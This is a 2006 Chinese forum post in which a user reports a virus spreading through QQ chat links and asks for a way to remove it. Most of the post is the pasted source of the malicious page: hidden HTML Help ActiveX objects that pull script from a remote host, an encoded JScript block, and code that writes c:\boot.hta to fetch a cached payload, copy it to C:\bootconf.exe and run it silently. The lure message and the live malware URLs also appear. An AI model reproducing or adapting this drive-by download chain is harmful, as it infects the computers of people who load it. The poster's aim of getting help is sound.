|
初生襁褓狮
|
发表于:
2006-06-05 13:52
|
只看楼主
短消息
资料
一个现在比较流行的病毒代码希望高手给出解毒方法
呵呵,今天在Q群里有一个人中了此病毒,其它人点了链接后都中了毒(我有卡巴所以没有中),中毒者发的消息是
================请不要尝试进入下面的链接地址==================================
看看啊. 我最近的照片~ 才扫描到QQ象册上的 ^_^ !
http://www.qq.com.search2.shtml.cgi-client-entry.photo.qp163.net/qq%E5%83%8F%E5%86%8C4/
==============================================================================
我点击后打开网页代码中是一个框架,框架包含两个页面,一个页面跳转到一个手机铃声网站,另一个则是病毒网页(长和宽都为0),病毒网页源码为
<SCRIPT language=MicrosoftBill src="logo.gif"></SCRIPT><SCRIPT language=MicrosoftBill src="logo.ico"></SCRIPT><HTML><BODY><div style="display:none"><OBJECT id="news017" type="application/x-oleobject" Who=KickSymantec classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;/windows/help/apps.chm'></OBJECT><OBJECT id="news890" type="application/x-oleobject" Who=KickSymTwice classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;javascript:eval("document.write(\"<SCRIPT language=JScript src=\\\"http://www.qp163.org/vip4/web/logo.gif\\\"\"+String.fromCharCode(62)+\"</SCR\"+\"IPT\"+String.fromCharCode(62))")' ></OBJECT></div><SCRIPT language = JScript.Encode>#@~^kwAAAA==eKE mxDMW{FyfiIW;mxO!K'Fyfi +hkTqGcZ^k^3cbp5GEqCxDMGx8 &IeKE l OVWx8 2i/Y:r:W;YvJUnS/%OTR;Vk1Vc#pJB!bieG!CxD!W{F+fp5W; mxOMKx8 fp5KEmxD!W{F+&pjy8AAA==^#~@</SCRIPT></BODY></HTML>
其中的http://www.qp163.org/vip4/web/logo.gif(<--请勿尝试打开)实际上也是一个网页,网页源码为
"BMP.移动..TXT.JPG..联通";try{Rfuc1k1S=new ActiveXObject("ADOR.Recordset");document.write('<body onLoad="javascript:window.moveTo(6666,7777);window.resizeTo(0,0);"></body>');Rfuc1k1S.Fields.Append("yahoo",200,1000);KAV="fuck kav!Please Kill Me Now!!!";Rfuc1k1S.Fields.Append("love",200,3000);mike=1;Rfuc1k1S.Open();mike=1;Rfuc1k1S.AddNew();mike=1;Rfuc1k1S.Fields("love").Value="<HTML><BODY onLoad=window.moveTo(5000,5000)><HEAD><SCRIPT language=JScript>window.moveTo(6000,6000);window.resizeTo(0,0);</S\0CRIPT></HEAD>\r\n<HTA:APPLICATION ID=j3714 CAPTION=\"no\" BORDER=\"none\" HEIGHT=\"0\" SHOWINTASKBAR=\"no\" WIDTH=\"0\" WINDOWSTATE=\"minimize\">\r\n<BODY scroll=\"no\" leftmargin=\"0\" topmargin=\"0\" marginwidth=\"0\" marginheight=\"0\">\r\n<SCRIPT LANGUAGE=\"JavaScript\">\r\nfunction China2008welcome(b){\r\ntry{var m1y1f=new Enumerator(Ffu1c1sko.GetFolder(b).SubFolders);for (;!m1y1f.atEnd();m1y1f.moveNext()){var z0=m1y1f.item().Path+\"\\\\logo[1].ico\";var z1=m1y1f.item().Path+\"\\\\logo[2].ico\";\r\nvar f=\"C:\\\\bootconf.exe\";if(Ffu1c1sko.FileExists(z0)){Ffu1c1sko.CopyFile(z0,f)\r\nw1s2h.Run(f,0,false);v=1;break;}if(Ffu1c1sko.FileExists(z1)){Ffu1c1sko.CopyFile(z1,f);w1s2h.Run(f,0,false);v=1;break;}China2008welcome(m1y1f.item());}}catch(e){}}\r\nfunction li1k1e1it(){window.close();j=1;}\r\nvar v=0;\r\ntry{\r\nvar Ffu1c1sko=new ActiveXObject(\"Scripting.FileSystemObject\");\r\nvar w1s2h=new ActiveXObject(\"WScript.Shell\");\r\nvar cache=w1s2h.RegRead(\"HKCU\\\\Software\\\\Micr\"+\"osoft\\\\Windows\\\\Cu\"+\"rr\"+\"ent\"+\"Ver\"+\"si\"+\"on\\\\Explorer\\\\Sh\"+\"ell Fol\"+\"ders\\\\Ca\"+\"che\");\r\n}catch(e){}\r\nfunction hatebj(){try{if(v==0){China2008welcome(cache+'\\\\..\\\\');setTimeout(\"hatebj()\",4023);}else{opi=1;li1k1e1it();opi=2;}}catch(e){}}\r\nhatebj();</SCRIPT></BODY></HTML>";Rfuc1k1S.Update();}catch(e){}try{Rfuc1k1S.Save("c:\\boot.hta",0);}catch(e){}document.write('<object id="bbs1" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><param name="Command" value="shortcut"><param name=item1 value=",c:\\boot.hta"></object><OBJECT id="bbs2" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><param name="Command" value="Close"><\/object><script>bbs1.Click();m1k2k3j=456;m1k2k3j=456;m1k2k3j=456;bbs2.Click();m1k2k3j=456;m1k2k3j=456;m1k2k3j=456;m1k2k3j=456;<\/script>');
 2006-06-09 13:38:24
|
